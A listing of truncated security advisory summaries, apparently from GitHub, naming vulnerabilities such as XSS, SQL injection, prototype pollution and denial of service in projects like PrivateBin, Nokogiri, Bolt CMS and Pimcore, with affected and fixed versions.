GitHub

In PrivateBin < v1.4.0 a cross-site scripting (XSS) vulnerability was found. The vulnerability is present since attachments with image preview got introduced in v0.21 of the project, which was at the time still called ZeroBin. The issue is caused by…

.NET Core 1.0, 1.1, and 2.0 allow an unauthenticated attacker to remotely cause a denial of service attack against a .NET Core web application by improperly parsing certificate data. A denial of service vulnerability exists when .NET Core improperly ha…

fullPage utils are available to developers using window.fp_utils. They can use these utils for their own use-case (other than fullPage) as well. However, one of the utils deepExtend is vulnerable to Prototype Pollution vulnerability.
Javascript is “pro…

Bolt CMS <= 4.2 is vulnerable to Remote Code Execution. Unsafe theme rendering allows an authenticated attacker to edit theme to inject server-side template injection that leads to remote code execution.
References

https://nvd.nist.gov/vuln/detail/…

Summary
Nokogiri v1.13.4 updates the vendored org.cyberneko.html library to 1.9.22.noko2 which addresses CVE-2022-24839. That CVE is rated 7.5 (High Severity).
See GHSA-9849-p7jc-9rmv for more information.
Please note that this advisory only applies to…

Summary
Nokogiri v1.13.4 updates the vendored xerces:xercesImpl from 2.12.0 to 2.12.2, which addresses CVE-2022-23437. That CVE is scored as CVSS 6.5 “Medium” on the NVD record.
Please note that this advisory only applies to the JRuby implementation of…

Summary
Nokogiri v1.13.4 updates the vendored zlib from 1.2.11 to 1.2.12, which addresses CVE-2018-25032. That CVE is scored as CVSS 7.4 “High” on the NVD record as of 2022-04-05.
Please note that this advisory only applies to the CRuby implementation …

Summary
Nokogiri < v1.13.4 contains an inefficient regular expression that is susceptible to excessive backtracking when attempting to detect encoding in HTML documents.
Mitigation
Upgrade to Nokogiri >= 1.13.4.
Severity
The Nokogiri maintainers …

There is a cross-site scripting vulnerability with default onCellHtmlData function in GitHub repository hhurz/tableexport.jquery.plugin prior to 1.25.0. This can result in transmitting cookies to third-party servers and/or sending data from secure sess…

Pimcore prior to version 10.3.5 is vulnerable SQL injection in RecyclebinController.php. This vulnerability affects data confidentiality.
References

https://nvd.nist.gov/vuln/detail/CVE-2022-1219
https://github.com/pimcore/pimcore/commit/a697830359df0…